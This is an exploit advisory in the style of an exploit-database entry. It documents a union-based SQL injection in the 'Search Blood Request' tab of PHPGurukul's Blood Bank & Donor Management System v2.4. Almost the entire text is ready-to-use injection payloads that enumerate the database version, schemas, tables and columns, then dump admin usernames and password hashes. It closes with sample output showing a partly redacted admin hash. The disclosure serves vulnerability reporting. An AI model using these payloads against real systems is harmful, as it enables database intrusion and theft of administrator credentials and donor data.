# Exploit Title: Blood Bank & Donor Management System v2.4 - Union
Based SQLi (Manuel Exploit)
# Date: 2025-04-07
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/blood-bank-donor-management-system-free-download/
# Demo Site: http://localhost/BBDMS-Project-PHP-V2.4/bbdms
# Tested on: Kali Linux
# CVE: N/A

PoC:

1. login as admin
2. go to "Search Blood Request" tab and give this payload

For version:
------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,version()-- -
------------------------------------------------------------------

For databases:
------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,schema_name FROM
information_schema.schemata-- -
------------------------------------------------------------------

tables in the database:
------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,table_name FROM information_schema.tables
WHERE table_schema='bbdms'-- -
------------------------------------------------------------------

columns in the table
------------------------------------------------------------------
1' UNION SELECT 1,2,3,4,5,6,7,8,9,column_name FROM
information_schema.columns WHERE table_name='tbladmin'-- -
------------------------------------------------------------------

dump data
------------------------------------------------------------------
1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,concat(UserName,":",Password) FROM
bbdms.tbladmin-- -
------------------------------------------------------------------

S.NoName of DonarConatact Number of DonarName of RequirerMobile Number of
RequirerEmail of RequirerBlood Require ForMessage of RequirerApply Date
1 9 admin:f925916[REDACTED]251 2 4 3 5 6